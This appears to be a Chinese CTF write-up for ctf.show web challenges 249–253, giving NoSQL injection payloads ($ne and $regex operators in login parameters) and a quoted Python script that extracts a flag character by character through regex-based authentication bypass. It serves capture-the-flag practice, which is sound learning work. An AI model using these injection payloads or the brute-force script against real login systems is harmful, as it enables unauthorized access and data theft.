试了其他文章的payload，没用成功，自己就写下来吧。
做题有三点注意，url编码，加不加8080（有的脚本url里面加8080，如果不行就去掉，行就不管），用不用Burpsuite的Repeater（有的信息要用Repeater才能看见）

web249

/api/?id[]=flag&page=1&limit=10

一些文章的payload少了page=1&limit=10

web250

我用username[$ne]=1&password[$ne]=1失败了，下面这个可以

username[$ne]=1&password[$regex]=ct

web251

username[$ne]=1&password[$regex]={

web252

username[$ne]=1&password[$regex]={

web253

用yu师傅的脚本就行

#author:yu22x
import requests
url="http://23fde3ab-6f1e-45f0-a918-576d3ac9525b.challenge.ctf.show/api/index.php"
flag="ctfshow{"
s='0123456789abcdef-}'
for i in range(9,46):
    print(i)
    for j in s:
        data={
            'username[$ne]':'1',
            'password[$regex]':f'^{flag+j}'
        }
        r=requests.post(url=url,data=data)
        if r"\u767b\u9646\u6210\u529f" in r.text:
            flag+=j
            print(flag)
            if j=="}":
                exit()
            break